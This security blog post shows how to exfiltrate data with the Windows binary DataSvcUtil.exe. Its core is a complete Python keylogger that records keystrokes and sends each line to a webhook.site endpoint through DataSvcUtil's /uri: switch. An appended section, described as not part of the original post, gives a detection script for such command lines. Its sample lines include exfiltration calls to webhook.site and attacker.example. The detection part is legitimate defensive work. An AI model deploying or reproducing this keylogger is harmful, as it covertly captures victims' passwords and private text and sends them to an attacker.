
Data Exfiltration with LOLBins

/uri:serviceuri is the switch that matters here: DataSvcUtil fetches whatever URI you give it, so you simply hand it a URL whose query string carries the data you want out of the machine. The tool then makes that request for you, and the data lands in the listener's request log.
Event with webhook.site
```python
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import subprocess
import sys
from urllib.parse import quote

# webhook.site endpoint that receives the exfiltrated keystrokes (placeholder URL)
URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
# LOLBin used as the uploader: DataSvcUtil fetches whatever /uri: points to,
# so the captured keystrokes ride along in the query string of that URL
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
content = ""


def on_press(key):
    global content
    if key == Key.backspace:
        content += ' '
    elif getattr(key, 'char', None):
        content += key.char        # printable key: keep the character itself
    else:
        content += str(key)        # special key, e.g. Key.space or Key.tab
    print(f'last key: {str(key)}')
    print("")
    if key == Key.enter:
        # percent-encode the buffer so it survives as a URL query string
        upload_url = f'{URL}?{quote(content, safe="")}'
        # DataSvcUtil's documented switches: /out: (output file) and /uri: (service URI)
        subprocess.call([uploader, '/out:c:\\temp\\test.xml', f'/uri:{upload_url}'])
        content = ''               # reset the buffer after each upload
    if getattr(key, 'char', None) == '\x03':   # Ctrl+C
        return False               # returning False stops the pynput listener


if __name__ == "__main__":
    try:
        with Listener(on_press=on_press) as listener:
            listener.join()
    except (KeyboardInterrupt, SystemExit):
        sys.exit(0)
```
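The defensive counterpart of the keylogger above, as an added example that is not part of the original post: a small hunt over process-creation command lines that flags DataSvcUtil.exe being pointed at an external /uri: and recovers whatever was packed into the query string. The sample command lines (constructed, in the shape a Sysmon Event ID 1 or Security 4688 record would carry), the internal-host list and the function names are assumptions for illustration.

```python
# Added example (not from the original post): hunt for DataSvcUtil-based
# exfiltration in process-creation logs and recover the payload from /uri:.
import ipaddress
import re
from urllib.parse import urlsplit, unquote

# Constructed sample command lines, shaped like Sysmon Event ID 1 / 4688 records.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe" /out:c:\temp\test.xml '
    r'/uri:https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx?hello%20world%20Key.enter',
    r'DataSvcUtil.exe /out:C:\proj\Northwind.cs /uri:http://localhost:5000/Northwind.svc',
    r'C:\Windows\System32\notepad.exe C:\Users\bob\notes.txt',
    r'datasvcutil /language:CSharp /out:svc.cs /uri:https://attacker.example/collect?dGVzdA==',
]

# Hosts a legitimate OData code-generation run would plausibly talk to (assumed list).
INTERNAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Match the binary name whether it is quoted, full-path or bare, case-insensitively.
TOOL_RE = re.compile(r'(^|[\\\s"])datasvcutil(\.exe)?(["\s]|$)', re.IGNORECASE)
# Pull the value of the /uri: switch (quoted or unquoted).
URI_RE = re.compile(r'/uri:("[^"]+"|\S+)', re.IGNORECASE)


def extract_uri(cmdline):
    """Return the /uri: argument of a command line, or None if absent."""
    m = URI_RE.search(cmdline)
    return m.group(1).strip('"') if m else None


def is_external(host):
    """True for anything that is not a loopback/private address or a known internal name."""
    if host in INTERNAL_HOSTS:
        return False
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True   # a DNS name we do not recognise: treat as external


def analyse(cmdline):
    """Return a finding for a suspicious DataSvcUtil invocation, else None."""
    if not TOOL_RE.search(cmdline):
        return None
    uri = extract_uri(cmdline)
    if uri is None:
        return None
    parts = urlsplit(uri)
    host = parts.hostname or ""
    if not is_external(host):
        return None
    reason = "DataSvcUtil contacting external host"
    if parts.query:
        reason += " with data in the query string"
    return {
        "host": host,
        "payload": unquote(parts.query),   # the exfiltrated bytes, percent-decoded
        "reason": reason,
        "cmdline": cmdline,
    }


def hunt(lines):
    """Run analyse() over a batch of command lines and keep the hits."""
    return [finding for finding in map(analyse, lines) if finding]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_COMMAND_LINES):
        print(f"[{finding['host']}] {finding['reason']}: {finding['payload']!r}")
```

The decision is deliberately narrow: DataSvcUtil has a legitimate job (generating client code from an OData service), so the alert keys on an external destination rather than on the binary alone, and the decoded query string is kept so the analyst can see exactly what left the host.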

Written by: reverse engineering and malware tales (LinkedIn: @isdebuggerpresent)
